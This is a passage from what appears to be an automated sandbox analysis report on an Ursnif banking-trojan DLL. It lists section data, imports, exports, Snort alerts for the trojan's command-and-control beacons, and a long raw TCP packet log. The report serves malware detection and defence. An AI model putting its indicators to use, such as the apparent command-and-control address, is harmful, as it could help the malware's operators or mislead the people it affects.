                                        .data0xe0000x1c43a0x14400False0.654079861111data5.49862585867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .reloc0x2b0000x9940xa00False0.833984375data6.65585202764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Imports

                                        DLLImport
                                        advapi32.dllAllocateAndInitializeSid, RegCreateKeyExW, RegDeleteValueW, FreeSid, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, RegSetValueExW, CheckTokenMembership
                                        amstream.dllDllCanUnloadNow
                                        crypt32.dllCertGetCertificateChain, CertFreeCertificateContext, CryptQueryObject, CryptMsgClose, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CryptMsgGetAndVerifySigner, CryptHashPublicKeyInfo, CryptDecodeObject, CryptMsgGetParam, CertCloseStore
                                        dsauth.dllDhcpDsCleanupDS
                                        gdi32.dllCreateFontIndirectW, GetObjectW
                                        hnetcfg.dllHNetDeleteRasConnection
                                        iernonce.dllRunOnceExProcess
                                        kbdbene.dllKbdLayerDescriptor
                                        kbdbu.dllKbdLayerDescriptor
                                        kbdes.dllKbdLayerDescriptor
                                        kbdgae.dllKbdLayerDescriptor
                                        kbdhe319.dllKbdLayerDescriptor
                                        kernel32.dllWideCharToMultiByte, UnhandledExceptionFilter, SetEvent, GetSystemTime, InterlockedIncrement, Sleep, CreateFileW, LoadLibraryExW, DelayLoadFailureHook, CreateDirectoryW, GetTempPathW, GetCurrentThreadId, GetFileAttributesW, SetFileTime, GetUserDefaultUILanguage, CreateWaitableTimerW, GetLastError, GetTickCount, QueryPerformanceCounter, GetStartupInfoA, CreateFileMappingW, GetCurrentProcessId, CloseHandle, LeaveCriticalSection, CancelWaitableTimer, TerminateProcess, InterlockedDecrement, UnmapViewOfFile, InterlockedCompareExchange, InitializeCriticalSection, LoadResource, LoadLibraryW, GetSystemDefaultUILanguage, GetNativeSystemInfo, VirtualProtect, GetFileTime, FindResourceW, HeapSetInformation, GetModuleFileNameW, MoveFileExW, LoadLibraryA, GetThreadLocale, InterlockedExchange, GetCurrentProcess, FileTimeToLocalFileTime, FormatMessageW, GetModuleHandleW, MapViewOfFile, CreateMutexW, MultiByteToWideChar, CreateEventW, SetUnhandledExceptionFilter, SearchPathW, LocalFree, LocalAlloc, GetExitCodeProcess, DeleteFileW, GetProcAddress, EnterCriticalSection, FreeLibrary, FindResourceExW, lstrcmpA, SetLastError, GetVersion, SetWaitableTimer, GetVersionExW, GetModuleHandleA, OutputDebugStringA, GetSystemDirectoryW, DeleteCriticalSection, ReleaseMutex, WaitForSingleObject
                                        loadperf.dllUnloadPerfCounterTextStringsW
                                        lpk.dllLpkGetCharacterPlacement
                                        mcicda.dllDriverProc
                                        mprapi.dllMprConfigInterfaceDelete
                                        msafd.dllWSPStartup
                                        msdmo.dllMoFreeMediaType
                                        msisip.dllDllRegisterServer
                                        msvcrt.dll__CxxFrameHandler, strcspn, _ultow, ___lc_handle_func, __crtGetStringTypeW, bsearch, _cexit, _controlfp, __set_app_type, abort, wctomb, _write, __pctype_func, malloc, ___lc_codepage_func, ___mb_cur_max_func, exit, _acmdln, ferror, wcsncmp, wcsrchr, _vsnwprintf, __setusermatherr, _lock, _lseeki64, _onexit, mbtowc, __RTDynamicCast, __crtLCMapStringW, __pioinfo, __uncaught_exception, _wtoi, _itoa, _errno, _wcsnicmp, memcpy, iswspace, setlocale, __badioinfo, _initterm, _callnewh, _amsg_exit, localeconv, _unlock, _XcptFilter, memmove, _CxxThrowException, __mb_cur_max, _wcsicmp, isleadbyte, _snprintf, __getmainargs, _iob, _isatty, _purecall, memchr, _fileno, _ltow, _beginthreadex, __dllonexit, free, _waccess, _ismbblead, _exit, memset
                                        ntdll.dllRtlUnwind
                                        ole32.dllStringFromCLSID, CoRevokeClassObject, CoUninitialize, CLSIDFromString, CoInitializeEx, CoInitializeSecurity, CoRegisterClassObject, CoCreateInstance, CoTaskMemFree
                                        opengl32.dllglLoadMatrixf
                                        rasdlg.dllRasUserEnableManualDial
                                        scrobj.dllDllUnregisterServerEx
                                        scrrun.dllDllRegisterServer
                                        serialui.dlldrvGetDefaultCommConfigW
                                        shell32.dllShell_NotifyIconW, ShellExecuteExW
                                        shlwapi.dllPathFindExtensionW, AssocQueryStringW
                                        termmgr.dllDllUnregisterServer
                                        urlmon.dllCoInternetParseUrl, URLDownloadToCacheFileW, CoInternetCombineUrl
                                        user32.dllGetClipboardData, MessageBoxW, SendDlgItemMessageW, GetSystemMetrics, OffsetRect, GetParent, DialogBoxParamW, GetSubMenu, PostThreadMessageW, DefWindowProcW, GetIconInfo, GetDesktopWindow, GetCursorPos, RegisterClassW, LoadIconW, PostQuitMessage, UnregisterClassW, DestroyWindow, EnableMenuItem, DispatchMessageW, LoadMenuW, TrackPopupMenu, LoadStringW, SetWindowPos, LoadImageW, CreateWindowExW, EndDialog, GetWindowRect, TranslateMessage, GetMessageW, CopyRect, SendMessageW, SetWindowTextW, SetForegroundWindow, DestroyMenu
                                        wdigest.dllSpInstanceInit
                                        wintrust.dllWinVerifyTrust
                                        wshtcpip.dllWSHSetSocketInformation

                                        Exports

                                        NameOrdinalAddress
                                        Bighearted10x402440
                                        Soaking20x40289c
                                        Turnipy30x403499
                                        Watertight40x403dae
                                        Dithery50x40413e
                                        Anhimae60x404662
                                        Anostraca70x405543
                                        DllRegisterServer80x40d358
                                        Anaerobian90x40618b
                                        Sparsile100x407496
                                        DllUnregisterServer110x40d380

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        09/10/21-11:34:16.615251TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4985980192.168.2.513.225.29.132
                                        09/10/21-11:34:16.615251TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4985980192.168.2.513.225.29.132
                                        09/10/21-11:34:19.499046TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986380192.168.2.513.225.29.132
                                        09/10/21-11:34:43.724298TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4990780192.168.2.513.225.29.132
                                        09/10/21-11:34:43.724298TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4990780192.168.2.513.225.29.132
                                        09/10/21-11:35:30.222900ICMP399ICMP Destination Unreachable Host Unreachable10.200.16.217192.168.2.5

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 10, 2021 11:33:35.791609049 CEST804991013.225.29.132192.168.2.5
                                        Sep 10, 2021 11:33:35.791735888 CEST4991080192.168.2.513.225.29.132
                                        Sep 10, 2021 11:33:36.740395069 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.740439892 CEST44349763104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.740515947 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.740549088 CEST44349764104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.740560055 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.740619898 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.745070934 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.745104074 CEST44349764104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.745263100 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.745287895 CEST44349763104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.791759968 CEST44349764104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.791887999 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.795672894 CEST44349763104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.796056032 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.827502012 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.827533960 CEST44349764104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.828013897 CEST44349764104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.828100920 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.828176022 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.850941896 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.850974083 CEST44349763104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.851387978 CEST44349763104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.851507902 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.859852076 CEST44349764104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.859956026 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.859980106 CEST44349764104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.860044956 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.877686024 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:36.877856016 CEST44349764104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:36.877929926 CEST49764443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:46.209985971 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.210072041 CEST4434981987.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.210170984 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.213253021 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.213283062 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.213548899 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.214986086 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.215009928 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.230537891 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.230583906 CEST4434981987.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.264796972 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.264909983 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.265203953 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.265491009 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.271790981 CEST4434981987.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.271997929 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.272022009 CEST4434981987.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.272294044 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.277698040 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.277710915 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.278115034 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.278172016 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.278182030 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.288378954 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.288397074 CEST4434981987.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.288902044 CEST4434981987.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.289042950 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.300472021 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.300537109 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.300573111 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.300574064 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.300585985 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.300602913 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.300637007 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.300638914 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.300647974 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.300705910 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.300751925 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.300756931 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.300756931 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.300767899 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.301131964 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.301146984 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.301294088 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318099976 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318186998 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318226099 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318238020 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318252087 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318272114 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318284988 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318309069 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318339109 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318342924 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318353891 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318360090 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318403959 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318413019 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318418980 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318497896 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318499088 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318511963 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318564892 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318572998 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318614960 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318666935 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318681955 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318691015 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318698883 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318737030 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318742990 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318748951 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318797112 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318802118 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318855047 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318862915 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318932056 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318964005 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318975925 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.318984985 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.318991899 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.319031000 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.319036007 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.319098949 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.319149017 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335278034 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335355043 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335397959 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335401058 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335414886 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335424900 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335464954 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335468054 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335473061 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335479021 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335531950 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335536957 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335542917 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335549116 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335594893 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335606098 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335612059 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335618019 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335666895 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335673094 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335678101 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335717916 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335719109 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335736990 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335774899 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335796118 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335797071 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335805893 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335866928 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335880995 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335890055 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335917950 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335936069 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335977077 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335983038 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.335990906 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.335999012 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336020947 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336040020 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336075068 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336080074 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336086988 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336096048 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336118937 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336139917 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336182117 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336189032 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336198092 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336235046 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336239100 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336250067 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336291075 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336298943 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336389065 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336427927 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336431026 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336440086 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336447954 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336487055 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336493015 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336498022 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336549044 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336591959 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336596012 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336604118 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336611986 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336638927 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336675882 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336709023 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336720943 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336729050 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336736917 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336772919 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336775064 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336779118 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336783886 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.336824894 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.336846113 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352368116 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352456093 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352504015 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352519035 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352530956 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352566957 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352616072 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352624893 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352633953 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352668047 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352734089 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352742910 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352751017 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352869987 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352921963 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352926016 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352926970 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352941036 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.352991104 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.352998972 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353004932 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353048086 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353090048 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353095055 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353096008 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353107929 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353157043 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353163958 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353168964 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353208065 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353229046 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353236914 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353286982 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353290081 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353295088 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353302002 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353362083 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353368998 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353374004 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353423119 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353463888 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353466988 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353471994 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353476048 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353522062 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353533983 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353539944 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353585958 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353593111 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353634119 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353641033 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353693962 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353738070 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353749037 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353756905 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353812933 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353854895 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353864908 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353873014 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353914022 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353957891 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.353967905 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.353975058 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354021072 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354022026 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354034901 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354091883 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354096889 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354100943 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354136944 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354176044 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354182959 CEST4434982087.248.118.22192.168.2.5
